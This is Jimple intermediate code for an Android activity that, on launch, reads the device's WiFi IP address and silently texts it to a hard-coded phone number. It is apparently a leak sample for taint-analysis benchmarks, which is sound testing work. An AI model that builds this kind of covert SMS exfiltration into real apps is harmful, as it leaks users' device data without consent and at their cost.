public class com.example.no_buttons.MainActivity extends androidx.appcompat.app.AppCompatActivity
{
    public android.content.Intent ipcIntent;
    public android.content.Intent ipcResultIntent;

    public void <init>()
    {
        com.example.no_buttons.MainActivity $r0;

        $r0 := @this: com.example.no_buttons.MainActivity;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void <init>()>();

        return;
    }

    protected void onCreate(android.os.Bundle)
    {
        com.example.no_buttons.MainActivity $r0;
        android.os.Bundle $r1;
        android.content.Context $r2;
        java.lang.Object $r3;
        android.net.wifi.WifiManager $r4;
        android.net.wifi.WifiInfo $r5;
        int $i0;
        java.lang.String $r6;
        android.telephony.SmsManager $r7;

        $r0 := @this: com.example.no_buttons.MainActivity;

        $r1 := @parameter0: android.os.Bundle;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void onCreate(android.os.Bundle)>($r1);

        virtualinvoke $r0.<com.example.no_buttons.MainActivity: void setContentView(int)>(2131296284);

        $r2 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: android.content.Context getApplicationContext()>();

        $r3 = virtualinvoke $r2.<android.content.Context: java.lang.Object getSystemService(java.lang.String)>("wifi");

        $r4 = (android.net.wifi.WifiManager) $r3;

        $r5 = virtualinvoke $r4.<android.net.wifi.WifiManager: android.net.wifi.WifiInfo getConnectionInfo()>();

        $i0 = virtualinvoke $r5.<android.net.wifi.WifiInfo: int getIpAddress()>();

        $r6 = staticinvoke <java.lang.Integer: java.lang.String toString(int)>($i0);

        $r7 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        virtualinvoke $r7.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("8502920020", null, $r6, null, null);

        return;
    }

    public android.content.Intent getIntent()
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent $r0;

        this := @this: com.example.no_buttons.MainActivity;

        $r0 = this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent>;

        return $r0;
    }

    public void setIntent(android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent parameter0;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent> = parameter0;

        return;
    }

    public void setResult(int, android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        int parameter0;
        android.content.Intent parameter1;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: int;

        parameter1 := @parameter1: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcResultIntent> = parameter1;

        return;
    }
}
